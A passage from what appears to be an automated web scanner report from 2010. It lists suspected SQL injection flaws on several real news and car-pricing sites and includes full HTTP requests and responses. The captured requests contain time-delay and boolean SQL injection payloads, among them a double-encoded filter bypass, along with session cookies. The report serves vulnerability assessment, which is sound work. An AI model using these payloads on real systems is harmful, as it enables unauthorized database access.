GET /oz/sensor?p=rubicon&pc=5833/7750&cd=false&xt=31&k=mercury+news:176,san+jose:160,news:158,rss+feed:136,rss+feeds:128,mercury+new:88,rss+san:80,columns:80,jose+mercury:80,special+reports:80,new:79,rss+terms:64,life+style:64,find+us:64,local+news:64,news+video:64,food+dining:64,video:64,sports+video:64,entertainment+video:64,company+news:64,mobile+device:64,college+teams:64,follow+us:64,business+video:64,opinion+editorial:64,feed:59,sports:48,twitter:48,mercury:44,jose:40,real+simple:40,syndicate+feeds:40,business:40,column:40,simple+syndicate:40,rss+real:40,news+rss:40,feeds:34,access:32,&t=RSS+-+San+Jose+Mercury+News HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/rss
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GF2RE1HF-38CG-10.244.194.4; put_1197=3139581898413592329; put_2081=CC-00000000320688809; put_1512=%5Bnil%5D; put_1994=13371vxjy3fi8; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; put_1986=1253520181866309356; put_1185=9222939536171538409; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; ruid=254cb0a61dae79de123c116f^6^1291762372^2927222290; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; khaos=GFEPV6UK-2-91QT; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%264894%3D1%264212%3D1%265446%3D1%262372%3D1'%20and%201%3d2--%20; rdk9=1; csi9=441746.js^2^1291762415^1291762418&3181771.js^1^1291762417^1291762417&3172324.js^2^1291762387^1291762395; rdk=5833/7750; rdk2=0; csi2=3137272.js^3^1291762416^1291762420&3181577.js^1^1291762417^1291762417&3172323.js^1^1291762415^1291762415&2617282.js^2^1291762395^1291762401&441745.js^3^1291762372^1291762390; cd=false; dq=13|1|12|0

Response 2

HTTP/1.1 204 No Content
Date: Wed, 08 Dec 2010 00:32:34 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.129. http://www.bkrtx.com/js/bk-static.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bkrtx.com
Path:   /js/bk-static.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 35022 milliseconds to respond to the request, compared with 3 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /js'waitfor%20delay'0%3a0%3a20'--/bk-static.js HTTP/1.1
Host: www.bkrtx.com
Proxy-Connection: keep-alive
Referer: http://www.carpricesecrets.com/page_footer_frame.php?vid=1&detid=1002&zip=&make=Mercury&make_id=28&model=&key=New+CPCLogic&body=&msrp=N%2FA&year=&page_category=landing
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 504 Gateway Time-out
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 175
Cache-Control: max-age=86400
Date: Wed, 08 Dec 2010 01:36:22 GMT
Connection: close

<HTML><HEAD><TITLE>Error</TITLE></HEAD><BODY>
An error occurred while processing your request.<p>
Reference&#32;&#35;97&#46;a675aad1&#46;1291772182&#46;225ed38
</BODY></HTML>

1.130. http://www.bkrtx.com/js/bk-static.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bkrtx.com
Path:   /js/bk-static.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload %2527waitfor%2520delay%25270%253a0%253a20%2527%252d%252d was submitted in the REST URL parameter 2. The application took 34085 milliseconds to respond to the request, compared with 3 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/bk-static.js%2527waitfor%2520delay%25270%253a0%253a20%2527%252d%252d HTTP/1.1
Host: www.bkrtx.com
Proxy-Connection: keep-alive
Referer: http://www.carpricesecrets.com/page_footer_frame.php?vid=1&detid=1002&zip=&make=Mercury&make_id=28&model=&key=New+CPCLogic&body=&msrp=N%2FA&year=&page_category=landing
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 504 Gateway Time-out
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 175
Cache-Control: max-age=86400
Date: Wed, 08 Dec 2010 01:40:56 GMT
Connection: close

<HTML><HEAD><TITLE>Error</TITLE></HEAD><BODY>
An error occurred while processing your request.<p>
Reference&#32;&#35;97&#46;a675aad1&#46;1291772456&#46;226aa26
</BODY></HTML>

1.131. http://www.carpricesecrets.com/mercury [t_mtype parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.carpricesecrets.com
Path:   /mercury

Issue detail

The t_mtype parameter appears to be vulnerable to SQL injection attacks. The payloads 49362984'%20or%201%3d1--%20 and 49362984'%20or%201%3d2--%20 were each submitted in the t_mtype parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mercury?t_se=msn&t_campid=1295942&t_adgpid=147006720&t_adid=262573534&t_keyid=1323580327&t_mtype=c49362984'%20or%201%3d1--%20 HTTP/1.1
Host: www.carpricesecrets.com
Proxy-Connection: keep-alive
Referer: http://cm.npc-medianews.overture.com/js_1_0/?config=2554942840&type=misc&ctxtId=misc&keywordCharEnc=utf8&source=npc_mng_sanjosemercurynews_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.mercurynews.com%2F&du=1&cb=1291762313102&ctxtContent=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 00:37:30 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: Apache=174.121.222.18.1291768650859840; path=/; expires=Tue, 03-Dec-30 00:37:30 GMT
X-Powered-By: PHP/5.2.10
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDi CONi OUR DELa SAMi IND PHY ONL UNI COM NAV INT STA PRE"
Set-Cookie: PHPSESSID=04qimd7i4eptlr5qrb61n69d61; path=/; domain=www.carpricesecrets.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: detid=1002; expires=Wed, 15-Dec-2010 00:37:30 GMT; path=/; domain=www.carpricesecrets.com
Set-Cookie: landing_id=70445704; expires=Wed, 15-Dec-2010 00:37:30 GMT; path=/; domain=www.carpricesecrets.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27519

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Don't Miss Out on Year End Vehicle Sales!</title>
<meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1" />
<meta http-equiv="Content-Style-Type" content="text/css" />
<meta http-equiv="Content-Script-Type" content="application/javascript" />
<meta name="description" content="New Vehicle Prices are at an All-Time Low!" />
<meta name="keywords" content="mercury price quotes, mercury prices, new car prices, new car pricing" />
<link rel="shortcut icon" href="http://images.carpricesecrets.com/favicon.ico" type="image/x-icon" />

<link rel="stylesheet" type="text/css" href="http://images.carpricesecrets.com/css/reset.css" />
<link rel="stylesheet" type="text/css" href="http://images.carpricesecrets.com/css/nd_032509_mainstyles.css" />

<script language="javascript" type="text/javascript">

if (typeof(Local) === 'undefined') {
var Local = {};
}

</script>


<!-- OPTIMOST PAGE CODE V2.7 - Copyright 2002-2008 Interwoven, Inc. -->
<script language="javascript" type="text/javascript"><!--
var optimost={A:{},C:{},D:document,L:document.location,M:[ ],Q:{},T:new Date(),U:'',V:'2.7',Enabled:true,ST:"script",SA:
{"type":"text/javascript"},I:function(){var s=this.L.search;var c=this.D.cookie;if(s.length>3){for(var a=s.substring(1)
.split("&"),i=0,l=a.length;i<l;i++){var p=a[i].indexOf("=");if(p>0)this.Q[a[i].substring(0,p)]=unescape(a[i].substring(
p+1));}}if(c.length>3){for(var a=c.split(";"),i=0,b=a.length;i<b;i++){var v=a[i].split("=");while(v[0].substring(0,
1)==" ")v[0]=v[0].substring(1,v[0].length);if(v.length==2)this.C[v[0]]=unescape(v[1]);}}},B:function(){var n;this.A={
};var _o=this;this.A.D_ts=Math.round(_o.T.getTime()/1000);this.A.D_tzo=_o.T.getTimezoneOffset();this.A.D_loc=_o.L.protocol+
"//"+_o.L.hostname+_o.L.pathname;this.A.D_ckl=_o.D.cookie.length;this.A.D_ref=_o.D.referrer;if(typeof optrial=="object")
for(n in optrial)this.A[n]=optrial[n];for(n in this.Q)this.A[n]=this.Q[n];for(n in this.C)if(n.substring(0,2)=="op")this.A[n]=
this.C[n];},S:functi
...[SNIP]...

Request 2

GET /mercury?t_se=msn&t_campid=1295942&t_adgpid=147006720&t_adid=262573534&t_keyid=1323580327&t_mtype=c49362984'%20or%201%3d2--%20 HTTP/1.1
Host: www.carpricesecrets.com
Proxy-Connection: keep-alive
Referer: http://cm.npc-medianews.overture.com/js_1_0/?config=2554942840&type=misc&ctxtId=misc&keywordCharEnc=utf8&source=npc_mng_sanjosemercurynews_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.mercurynews.com%2F&du=1&cb=1291762313102&ctxtContent=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 00:38:18 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: Apache=174.121.222.18.1291768698223179; path=/; expires=Tue, 03-Dec-30 00:38:18 GMT
X-Powered-By: PHP/5.2.10
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDi CONi OUR DELa SAMi IND PHY ONL UNI COM NAV INT STA PRE"
Set-Cookie: PHPSESSID=eppuftqhqhu6cu3jqgfom8v0e2; path=/; domain=www.carpricesecrets.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: detid=1002; expires=Wed, 15-Dec-2010 00:38:18 GMT; path=/; domain=www.carpricesecrets.com
Set-Cookie: landing_id=70445717; expires=Wed, 15-Dec-2010 00:38:18 GMT; path=/; domain=www.carpricesecrets.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27726

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Get the Lowest Mercury Price Quotes at CarPriceSecrets.com</title>
<meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1" />
<meta http-equiv="Content-Style-Type" content="text/css" />
<meta http-equiv="Content-Script-Type" content="application/javascript" />
<meta name="description" content="CarPriceSecrets.com finds the lowest possible Mercury prices at your local Mercury dealers. We also reveal the secrets to negotiating your lowest possible price on a new Mercury. Our service is fast and free." />
<meta name="keywords" content="mercury price quotes, mercury prices, new car prices, new car pricing" />
<link rel="shortcut icon" href="http://images.carpricesecrets.com/favicon.ico" type="image/x-icon" />

<link rel="stylesheet" type="text/css" href="http://images.carpricesecrets.com/css/reset.css" />
<link rel="stylesheet" type="text/css" href="http://images.carpricesecrets.com/css/nd_032509_mainstyles.css" />

<script language="javascript" type="text/javascript">

if (typeof(Local) === 'undefined') {
var Local = {};
}

</script>


<!-- OPTIMOST PAGE CODE V2.7 - Copyright 2002-2008 Interwoven, Inc. -->
<script language="javascript" type="text/javascript"><!--
var optimost={A:{},C:{},D:document,L:document.location,M:[ ],Q:{},T:new Date(),U:'',V:'2.7',Enabled:true,ST:"script",SA:
{"type":"text/javascript"},I:function(){var s=this.L.search;var c=this.D.cookie;if(s.length>3){for(var a=s.substring(1)
.split("&"),i=0,l=a.length;i<l;i++){var p=a[i].indexOf("=");if(p>0)this.Q[a[i].substring(0,p)]=unescape(a[i].substring(
p+1));}}if(c.length>3){for(var a=c.split(";"),i=0,b=a.length;i<b;i++){var v=a[i].split("=");while(v[0].substring(0,
1)==" ")v[0]=v[0].substring(1,v[0].length);if(v.length==2)this.C[v[0]]=unescape(v[1]);}}},B:function(){var n;this.A={
};var _o=this;this.A.D_ts=Math.round(_o.T.getTime()/1000);this.A.D_tzo=_o.T.getTimezoneOffset();this.A.D_loc=_o.L.protocol+
"//"+_o.L.hostname+_o.L.pathname;this.A.D_ckl=_o.D.cookie.length;this.A.D_ref=_o.D.re
...[SNIP]...

1.132. http://www.contracostatimes.com/california/ci_16783052 [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.contracostatimes.com
Path:   /california/ci_16783052

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 16701620'%20or%201%3d1--%20 and 16701620'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /california/ci_16783052?nclick_check=1 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
Referer: http://www.google.com/search?hl=en&q=16701620'%20or%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:53:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:53:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: EMETA_NCLICK_MNGI=3; path=/; expires=Thursday, 09-Dec-2010 01:53:47 GMT
Set-Cookie: JSESSIONID=U3VDF33SPCATACUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 66848

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The transgender community will have access to a new health clinic specifically designed with their needs in mind. The result of a partnership between Humboldt County transgender advocates and Bay Area agencies, the Humboldt Open Door Clinic is'><meta name="keywords" content="state news california bay area"/><title>Open Door starts Humboldt's first transgender health clinic - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn";
   MNGiRegistrationUrl = "https://secure.www.contracostatimes.com";
   MNGiIDCookieName = "MNGID";
</script><script
...[SNIP]...

Request 2

GET /california/ci_16783052?nclick_check=1 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
Referer: http://www.google.com/search?hl=en&q=16701620'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:53:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:53:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=FR3SDXL4NSFRECUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 66848

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The transgender community will have access to a new health clinic specifically designed with their needs in mind. The result of a partnership between Humboldt County transgender advocates and Bay Area agencies, the Humboldt Open Door Clinic is'><meta name="keywords" content="state news california bay area"/><title>Open Door starts Humboldt's first transgender health clinic - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn";
   MNGiRegistrationUrl = "https://secure.www.contracostatimes.com";
   MNGiIDCookieName = "MNGID";
</script><script language="JavaScript" type="text/javascript" src="http://extras.mnginteractive.com/li
...[SNIP]...

1.133. http://www.contracostatimes.com/ci_16759989 [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.contracostatimes.com
Path:   /ci_16759989

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 94603801'%20or%201%3d1--%20 and 94603801'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ci_16759989?source=most_viewed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
Referer: http://www.google.com/search?hl=en&q=94603801'%20or%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:53:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:53:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: EMETA_NCLICK_MNGI=3; path=/; expires=Thursday, 09-Dec-2010 01:53:49 GMT
Set-Cookie: JSESSIONID=CI4FIKSTESBRCCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 69824

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='A registered sex offender was arrested on suspicion of raping a 2-year-old girl in a Dollar Tree store as her relatives were Christmas shopping in the next aisle, police said Thursday.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Union City sex offender accused of raping 2-year-old - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript"
...[SNIP]...

Request 2

GET /ci_16759989?source=most_viewed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
Referer: http://www.google.com/search?hl=en&q=94603801'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:53:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:53:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=BDF2H33MBVKVCCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 69824

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='A registered sex offender was arrested on suspicion of raping a 2-year-old girl in a Dollar Tree store as her relatives were Christmas shopping in the next aisle, police said Thursday.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Union City sex offender accused of raping 2-year-old - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
